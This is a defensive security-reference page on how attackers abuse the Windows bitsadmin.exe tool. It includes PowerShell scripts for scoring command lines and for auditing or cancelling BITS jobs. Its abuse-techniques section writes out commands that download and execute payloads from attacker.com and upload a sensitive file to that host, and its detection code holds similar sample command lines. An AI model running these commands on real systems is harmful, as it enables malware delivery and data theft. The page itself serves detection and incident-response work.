Critical Risk | Windows | Legitimate | Commonly Abused
bitsadmin.exe | SYSTEM UTILITY

bitsadmin.exe - BITS Admin LOLBin Security Analysis

bitsadmin.exe is the **Background Intelligent Transfer Service** command-line tool and a **notorious LOLBin**. Attackers abuse it for **stealthy file downloads** that persist across reboots, **execution of downloaded payloads**, and **data exfiltration**. BITS jobs are difficult to detect and survive system restarts.

Risk Summary

CRITICAL priority for SOC triage. bitsadmin.exe is a top-tier LOLBin for persistent downloads and execution. Any /transfer, /create, or /addfile command requires **immediate investigation**. BITS jobs persist across reboots, which makes this binary particularly dangerous.

Overview

What is bitsadmin.exe?

bitsadmin.exe manages Windows Background Intelligent Transfer Service (BITS) jobs.

Legitimate Functions

BITS Management:

  • Download Windows updates
  • Transfer large files
  • Resume interrupted downloads
  • Background throttled transfers

Why It's Dangerous

LOLBin Capabilities:

  • Stealthy file downloads
  • Persistence across reboots
  • Execute downloaded files
  • Difficult to detect

Security Significance

  • Trusted Binary: Signed Microsoft tool
  • Persistence: Jobs survive restarts
  • Evasion: Traffic appears as BITS
  • Execution: Can run downloaded files

Normal Behavior

Expected Process State

Property    Expected Value
Path        C:\Windows\System32\bitsadmin.exe
Parent      cmd.exe, powershell.exe (admin)
User        Administrator
Context     Windows Update operations

Legitimate Usage

:: Check BITS jobs (legitimate)
bitsadmin /list /allusers

:: Windows Update context only

Frequency

Direct bitsadmin usage is rare; Windows components and administrative scripts typically use the BITS API or the PowerShell BitsTransfer cmdlets instead.

Common Locations

C:\Windows\System32\bitsadmin.exe
C:\Windows\SysWOW64\bitsadmin.exe

Suspicious Indicators

Legitimate vs Suspicious

LEGITIMATE (Very Rare)

Command:     bitsadmin /list
             bitsadmin /info
Context:     System administration
Frequency:   Rare

SUSPICIOUS (High Confidence)

Command:     bitsadmin /transfer /download http://...
             bitsadmin /create /addfile /resume
             bitsadmin /SetNotifyCmdLine
Context:     Any non-IT user
Frequency:   Any

Dangerous Parameters

Parameter           Risk        Description
/transfer           CRITICAL    Download file
/addfile            CRITICAL    Add file to job
/SetNotifyCmdLine   CRITICAL    Execute on completion
/resume             HIGH        Start download
/create             HIGH        Create new job
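As an added example (not code from the original page), the PowerShell function below scores a bitsadmin.exe command line taken from a process-creation event (Sysmon Event ID 1 or Security 4688) against the parameter table above and the legitimate/suspicious contexts of the previous section: read-only inspection (/list, /info) by an administrator is low, the CRITICAL/HIGH parameters escalate, and anything beyond inspection from a non-IT account is escalated further. The sample command lines, the user names, the CORP\itadmin allowlist and the example.invalid host are all constructed placeholders.

```powershell
function Get-BitsadminRisk {
    param(
        [Parameter(Mandatory)][string]$CommandLine,
        [string]$User = ''
    )
    # Risk table from the page; keys are lowercased because the command line is lowercased before matching
    $paramRisk = [ordered]@{
        '/transfer'         = 'CRITICAL'   # direct download/upload
        '/addfile'          = 'CRITICAL'   # add a remote file to a job
        '/setnotifycmdline' = 'CRITICAL'   # run a program when the job completes
        '/resume'           = 'HIGH'       # start the transfer
        '/create'           = 'HIGH'       # create a new job
    }
    $order      = @{ NONE = 0; LOW = 1; HIGH = 2; CRITICAL = 3 }
    $adminUsers = @('CORP\itadmin')        # constructed placeholder allowlist of IT accounts

    $cmd = $CommandLine.ToLowerInvariant()
    # Only bitsadmin invocations are scored; anything else is NONE
    if ($cmd -notmatch 'bitsadmin(\.exe)?') {
        return [pscustomobject]@{ Risk = 'NONE'; Matched = @(); Reason = 'not bitsadmin' }
    }

    $risk = 'NONE'; $matched = @(); $reasons = @()
    foreach ($p in $paramRisk.Keys) {
        if ($cmd.Contains($p)) {
            $matched += $p
            if ($order[$paramRisk[$p]] -gt $order[$risk]) { $risk = $paramRisk[$p] }
        }
    }
    if ($matched.Count -gt 0) { $reasons += "parameters: $($matched -join ', ')" }

    # Any remote URL on the command line is worth recording for the analyst
    if ($cmd -match 'https?://\S+') {
        $reasons += "remote URL: $($Matches[0])"
        if ($risk -eq 'NONE') { $risk = 'LOW' }
    }
    # Read-only inspection is the page's "legitimate (very rare)" case
    if ($matched.Count -eq 0 -and $cmd -match '/(list|info)\b') {
        $risk = 'LOW'; $reasons += 'read-only inspection'
    }
    # A non-IT user running bitsadmin at all is suspicious in any context
    if ($User -and ($adminUsers -notcontains $User) -and $risk -ne 'NONE') {
        $reasons += "non-IT user $User"
        if ($risk -eq 'LOW') { $risk = 'HIGH' }
    }
    [pscustomobject]@{ Risk = $risk; Matched = $matched; Reason = ($reasons -join '; ') }
}

# Constructed sample process-creation command lines (not real telemetry)
$samples = @(
    @{ User = 'CORP\itadmin'; Cmd = 'bitsadmin /list /allusers' },
    @{ User = 'CORP\jdoe';    Cmd = 'bitsadmin /transfer job /download /priority high http://example.invalid/mal.exe C:\Users\jdoe\mal.exe' },
    @{ User = 'CORP\jdoe';    Cmd = 'bitsadmin /SetNotifyCmdLine job C:\Users\jdoe\payload.exe' },
    @{ User = 'CORP\jdoe';    Cmd = 'bitsadmin /resume job' },
    @{ User = 'CORP\itadmin'; Cmd = 'powershell.exe -c Get-BitsTransfer -AllUsers' }
)
foreach ($s in $samples) {
    $r = Get-BitsadminRisk -CommandLine $s.Cmd -User $s.User
    '{0,-9} {1,-14} {2}' -f $r.Risk, $s.User, $r.Reason
}
```

The function is deliberately greedy: a command line carrying several parameters takes the highest risk among them, so the multi-step /create, /addfile, /resume chain shown later on this page scores CRITICAL as soon as the /addfile line appears, not only when the transfer starts.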

Abuse Techniques

Attack Techniques

Technique #1: File Download (T1197)

Download Malware via BITS:

bitsadmin /transfer job /download /priority high http://attacker.com/mal.exe C:\mal.exe

Persistent Download Job:

bitsadmin /create downloadjob
bitsadmin /addfile downloadjob http://attacker.com/payload.exe C:\payload.exe
bitsadmin /resume downloadjob
bitsadmin /complete downloadjob

Technique #2: Execute After Download (T1059)

bitsadmin /SetNotifyCmdLine job C:\payload.exe
bitsadmin /resume job

Technique #3: Persistence (T1197)

BITS jobs persist across reboots, so malware can create a job that downloads and executes its payload on every startup.

Technique #4: Data Exfiltration (T1048)

bitsadmin /transfer exfil /upload http://attacker.com/upload C:\sensitive.zip

Remediation Steps

Protection and Remediation

Defense: Monitor BITS Jobs

# Run periodically (for example from an elevated scheduled task) to audit BITS jobs for all users
Get-BitsTransfer -AllUsers | Export-Csv "bits_audit.csv"

Defense: Application Control

Restrict bitsadmin.exe to administrators.

If Compromise Suspected

  1. List all BITS jobs
  2. Cancel suspicious jobs
  3. Identify downloaded files
  4. Trace execution chain
  5. Remove persistence

:: Cancel a single suspicious job (step 2)
bitsadmin /cancel <job>
:: Cancel every job in the queue for all users (step 5)
bitsadmin /reset /allusers
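The PowerShell script below is an added example, not code from the original page. It covers both the "Monitor BITS Jobs" defense and the response steps above: it enumerates BITS jobs for every user, flags the indicators from the investigation checklist (a notification command line, source hosts outside a trusted list, executables dropped into user-writable paths, upload jobs), correlates with the BITS client operational event log, and cancels the flagged jobs only when -Cancel is passed. It assumes it runs elevated on the host under investigation with the BitsTransfer module available; the trusted-domain list is a constructed placeholder to replace with your own.

```powershell
#Requires -RunAsAdministrator
Import-Module BitsTransfer

function Find-SuspiciousBitsJob {
    param(
        # Constructed placeholder allowlist; replace with the update and intranet hosts you expect
        [string[]]$TrustedDomains = @('windowsupdate.com', 'microsoft.com', 'intranet.example.invalid'),
        [switch]$Cancel
    )
    $findings = foreach ($job in Get-BitsTransfer -AllUsers) {
        $reasons = @()
        # Execute-on-completion is the single strongest indicator on this page
        if ($job.NotifyCmdLine) { $reasons += "NotifyCmdLine=$($job.NotifyCmdLine)" }
        foreach ($f in $job.FileList) {
            $uri = $null
            if ([uri]::TryCreate($f.RemoteName, [UriKind]::Absolute, [ref]$uri)) {
                $trusted = $TrustedDomains | Where-Object { $uri.Host -eq $_ -or $uri.Host -like "*.$_" }
                if (-not $trusted) { $reasons += "untrusted source $($uri.Host)" }
            }
            # Executable content landing in user-writable locations
            if ($f.LocalName -match '^C:\\(Users|ProgramData|Windows\\Temp)\\' -and
                $f.LocalName -match '\.(exe|dll|ps1|bat|cmd|vbs|js|hta)$') {
                $reasons += "executable drop $($f.LocalName)"
            }
        }
        if ($job.TransferType -eq 'Upload') { $reasons += 'upload job (possible exfiltration)' }
        if ($reasons) {
            [pscustomobject]@{
                JobId   = $job.JobId
                Name    = $job.DisplayName
                Owner   = $job.OwnerAccount
                State   = $job.JobState
                Created = $job.CreationTime
                Reasons = $reasons -join '; '
            }
        }
    }
    if ($Cancel) {
        foreach ($f in $findings) {
            # Remove-BitsTransfer cancels the job and deletes any partially transferred files
            Get-BitsTransfer -AllUsers | Where-Object JobId -eq $f.JobId | Remove-BitsTransfer
        }
    }
    $findings
}

# Correlate with the BITS client operational log: ID 3 = job created, ID 59 = transfer started (records the URL)
function Get-BitsJobEvents {
    param([int]$Hours = 24)
    Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-Bits-Client/Operational'
        Id        = 3, 59
        StartTime = (Get-Date).AddHours(-$Hours)
    } -ErrorAction SilentlyContinue | Select-Object TimeCreated, Id, Message
}

# Review first; re-run with -Cancel once the findings have been triaged
Find-SuspiciousBitsJob | Format-Table -AutoSize
Get-BitsJobEvents | Format-Table -Wrap
```

The event-log correlation matters because a job that already completed no longer appears in Get-BitsTransfer; the operational log keeps the creation and transfer-start records (with the source URL) after the job is gone, which is what "identify downloaded files" and "trace execution chain" rely on.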

Investigation Checklist

  • List all BITS jobs with /list /allusers
  • Review job URLs and destinations
  • Check for /SetNotifyCmdLine
  • Identify downloaded files
  • Check if downloads executed
  • Review command line history
  • Cancel malicious jobs
  • Hunt for persistence

MITRE ATT&CK Techniques

  • T1197 - BITS Jobs (download, persistence)
  • T1059 - Command and Scripting Interpreter (execute after download)
  • T1048 - Exfiltration Over Alternative Protocol (upload jobs)

Last verified: January 18, 2026